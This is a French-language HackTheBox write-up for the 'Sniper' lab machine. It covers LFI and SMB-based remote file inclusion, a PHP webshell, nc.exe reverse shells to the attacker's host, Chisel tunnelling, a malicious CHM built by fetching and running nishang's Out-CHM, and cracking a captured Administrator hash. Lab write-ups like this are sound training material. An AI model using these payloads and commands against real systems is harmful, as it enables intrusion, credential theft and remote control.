Sniper HackTheBox (Writeup)

Skills:

Local File Inclusion (LFI)
Remote File Inclusion (RFI) [Failed]
Remote File Inclusion through SMB Server (net usershare technique) [Success]
Creating a webshell and achieving remote command execution [RCE]
Information Leakage [User Pivoting]
Playing with Chisel and ScriptBlocks using Invoke-Command
Creating a malicious CHM file (Out-CHM.ps1) [Privilege Escalation]

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.10.151 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard. (80,135,139,445,49667)

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p80,135,139,445,49667 10.10.10.151 -oN targeted

Port 80:

Analyse avec whatweb :

Nous avons utilisé whatweb pour identifier les technologies utilisées par le serveur web :

whatweb 10.10.10.151
http://10.10.10.151 [200 OK] Bootstrap[3.0.0], Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.10.151], JQuery[2.1.3], Microsoft-IIS[10.0], PHP[7.3.1], Script, Title[Sniper Co.], X-Powered-By[PHP/7.3.1]

Vulnérabilité LFI :

Sur la page de changement de langue, il y avait un paramètre lang permettant de charger des fichiers PHP différents selon la langue choisie.

Nous avons testé avec un fichier système local :

http://10.10.10.151/blog/?lang=\Windows\System32\drivers\etc\hosts

Ce qui nous a permis d'afficher le contenu du fichier hosts.

Tentatives de lecture de fichiers sensibles avec php://filter :

Nous avons tenté d'exploiter le LFI pour lire le fichier index.php du serveur web Microsoft IIS situé dans \inetpub\wwwroot\index.php, mais l'exploitation via php://filter n'a pas fonctionné.

php://filter/convet.base64-encode/ressource=\inetpub\wwwroot\index.php

Remote File Inclusion (RFI) [Failed]

Test de RFI via serveur web distant :

Nous avons tenté de charger un fichier distant via l'URL ?lang=http://10.10.14.3/index.html en pointant vers notre serveur web local avec Python3.

python3 -m http.server 80

?lang=http://10.10.14.3/index.html

mais cela n'a pas fonctionné.

Remote File Inclusion (SMB Server)

Création d'un serveur SMB:

Nous avons créé un serveur SMB local à l'aide de smbserver.py et partagé le répertoire courant :

smbserver.py share $(pwd) -smb2support

Ensuite, nous avons tenté de charger un fichier à partir du serveur SMB en modifiant le paramètre lang

?lang=\10.10.14.3\share\index.html

Cette fois, le serveur a correctement interprété notre fichier index.html, affichant son contenu ("Hello World").

Création d'un fichier webshell PHP (cmd.php)

Nous avons créé un fichier cmd.php sur notre serveur SMB pour exécuter des commandes à distance via le paramètre cmd :

<?php
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
?>

Exécution de commandes via SMB

\\10.10.14.3\share\cmd.php&cmd=<command>

En utilisant l'URL suivante, nous avons exécuté la commande whoami :

\\10.10.14.3\share\cmd.php&cmd=whoami

Reverse Shell (nc.exe)

Téléchargement de nc.exe pour reverse shell : Nous avons récupéré le binaire nc.exe depuis les outils de fuzzing dans /usr/share/SecLists/Web-Shells/FuzzDB/nc.exe et l'avons copié dans le répertoire de travail.

locate nc.exe 
cp /usr/share/SecLists/Web-Shells/FuzzDB/nc.exe .

Écoute sur le port 443 : Nous avons mis en place un listener avec nc pour écouter sur le port 443 :

rlwrap nc -nvlp 443

Exécution du reverse shell via SMB : Nous avons ensuite lancé un reverse shell en pointant le paramètre cmd vers notre fichier

?lang=\\10.10.14.3\share\cmd.php&cmd=\\10.10.14.3\share\nc.exe -e cmd 10.10.14.3 443

Nous avons ainsi obtenu un reverse shell vers notre machine.

Élévation de privilèges

Recherche de fichiers sensibles : Nous avons cherché des informations sensibles dans les fichiers PHP et avons trouvé le fichier db.php contenant des identifiants pour la base de données :

Utilisateur : dbuser
Mot de passe : 36mEAhz/B8xQ~2VM

Validation des identifiants pour un autre utilisateur :

Nous avons découvert un autre utilisateur nommé Chris en plus de l'utilisateur Administrator. Nous avons utilisé CrackMapExec pour valider si les identifiants de Chris étaient valides :

crackmapexec smb 10.10.10.151 -u 'Chris' -p '36mEAhz/B8xQ~2VM'

La connexion a réussi.

Vérification des privilèges de l'utilisateur "Chris" :

Nous avons observé que l'utilisateur Chris appartenait au groupe Remote Management User, ce qui lui permet de se connecter à distance.

Analyse des ports ouverts:

Le port nécessaire pour la connexion à distance (port 5985, utilisé par WinRM) n'était pas ouvert en externe, mais l'était en interne. Nous avons utilisé netstat pour vérifier les ports en écoute sur la machine cible :

netstat -an | findstr "LISTEN"

Port Forwarding (5985 WinRm)

1. PowerShell

Nous avons lancé PowerShell sur notre machine d'attaque :

powershell

Nous avons récupéré le nom de l'environnement Windows avec la commande hostname, et avons constaté que le nom d'hôte était Sniper.

hostname

Ensuite, nous avons créé une variable pour l'utilisateur Chris et une autre pour le mot de passe en utilisant ConvertTo-SecureString :

$user = "Sniper\Chris"

$password = ConvertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force

Puis, nous avons créé un objet PSCredential pour pouvoir exécuter des commandes à distance sur la machine cible :

$cred = New-Object System.Management.Automation.PSCredential($user, $password)

Exécution de commandes à distance : Nous avons utilisé la commande suivante pour exécuter whoami à distance et valider l'accès :

Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock {whoami}

Cela nous a permis de confirmer que nous étions bien connectés en tant que Chris.

Reverse shell : Pour obtenir un accès complet au système, nous avons mis en place un listener sur le port 4444 :

rlwrap nc -nlvp 4444

Ensuite, nous avons exécuté un reverse shell en utilisant nc.exe depuis notre serveur SMB :

Invoke-Command -Credential $cred -ComputerName Sniper -ScriptBlock {\\10.10.14.3\share\nc.exe -e cmd 10.10.14.3 4444

2. Chisel

Releases · jpillora/chiselGitHub

Téléchargement et préparation des fichiers : Nous avons téléchargé les fichiers Chisel compressés, à savoir :

chisel-linux
chisel-windows.exe

https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gzgithub.com

https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_windows_amd64.gzgithub.com

Après les avoir extraits, nous avons transféré le fichier Chisel pour Windows vers la machine cible :

copy \\10.10.14.3\smb\chisel-windows.exe chisel-windows.exe

Mise en écoute sur la machine attaquante avec Chisel : Nous avons lancé Chisel en mode serveur sur la machine attaquante sur le port 8888 :

./chisel-linux server -p 8888 -reverse

Ensuite, sur la machine Windows cible, nous avons exécuté Chisel en mode client pour nous connecter à notre machine attaquante et rediriger le port 5985 vers notre machine :

chisel-windows.exe client 10.10.14.3:8888 R:5985:127.0.0.1:5985

Vérification du port redirigé avec lsof : Nous avons vérifié que le port 5985 était bien en écoute après la redirection avec la commande :

Connexion avec WinRM : Nous avons utilisé CrackMapExec pour tester la connexion via WinRM sur le port 5985 redirigé :

crackmapexec winrm 10.10.14.3 -u 'Chris' -p '36mEAhz/B8xQ~2VM'

Nous avons obtenu le symbole pwned, confirmant que nous avions réussi à accéder à la machine via WinRM.

Connexion finale avec Evil-WinRM : Enfin, nous avons utilisé Evil-WinRM pour obtenir un shell à distance en tant que Chris :

evil-winrm -i 10.10.14.3 -u 'Chris' -p '36mEAhz/B8xQ~2VM'

Flag user.txt :)

Exploration du répertoire "docs" : Dans la racine de Windows, nous avons trouvé un dossier docs contenant un fichier note.txt avec le message suivant :

Salut Chris,
Tes compétences en PHP sont vraiment mauvaises. Contacte Yamitenshi pour qu'il t'apprenne à l'utiliser, puis corrige le site car il y a beaucoup de bugs dessus. J'espère aussi que tu as préparé la documentation pour notre nouvelle application. Dépose-la ici quand tu auras terminé.
Cordialement, Sniper CEO.

Recherche de la documentation dans le système : Nous avons cherché la documentation mentionnée par le CEO et l'avons trouvée dans le répertoire Downloads sous le fichier instructions.chm.

Création Fichier CHM malveillant :

Après avoir découvert que le CEO cherchait à consulter des fichiers CHM dans le répertoire docs, nous avons recherché sur Internet comment créer des fichiers CHM malveillants.

nishang/Client/Out-CHM.ps1 at master · samratashok/nishangGitHub

Téléchargement de l'outil HTML Help : Nous avons téléchargé HTML Help et utilisé un script PowerShell pour créer un fichier CHM malveillant

HTML Help

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Client/Out-CHM.ps1')

Puis, nous avons modifié le script pour exécuter une commande malveillante à distance via nc.exe :

Out-CHM -Payload "\\10.10.14.3\smb\nc.exe -e cmd 10.10.14.3 443" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Injection du fichier CHM malveillant dans le répertoire cible : Nous avons configuré un serveur SMB sur notre machine d’attaque pour transférer le fichier malveillant vers la machine Windows cible :

smbserver.py smbFolder $(pwd) -smb2support -username jordan -password jordan1234

Connexion au partage SMB depuis la machine victime : Depuis la machine Windows cible, nous avons monté le partage SMB et copié le fichier malveillant doc.chm :

net use x: \\192.168.0.190\smbFolder /user:jordan jordan1234
copy .\doc.chm x:\doc.chm

Mise en écoute pour le reverse shell : Nous avons lancé un listener sur notre machine attaquante, en attente d’une connexion reverse shell :

rlwrap nc -nlvp 443

Problème rencontré : Bien que le fichier CHM ait été consulté, nous n’avons pas reçu de reverse shell. Cependant, nous avons réussi à capturer un SMB Relay V2 sur notre serveur. Cela nous a fourni un hash d’authentification pour l’utilisateur Administrator

Crack du hash de l'administrateur :

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Administrator:butterfly!#1

Connexion en tant qu’administrateur:

Avec les identifiants obtenus, nous avons utilisé Evil-WinRM pour nous connecter à la machine en tant qu’administrateur :

evil-winrm -i 10.10.14.3 -u 'Administrator' -p 'butterfly!#1'

Flag root.txt :)

Mis à jour il y a 1 an

Ce contenu vous a-t-il été utile ?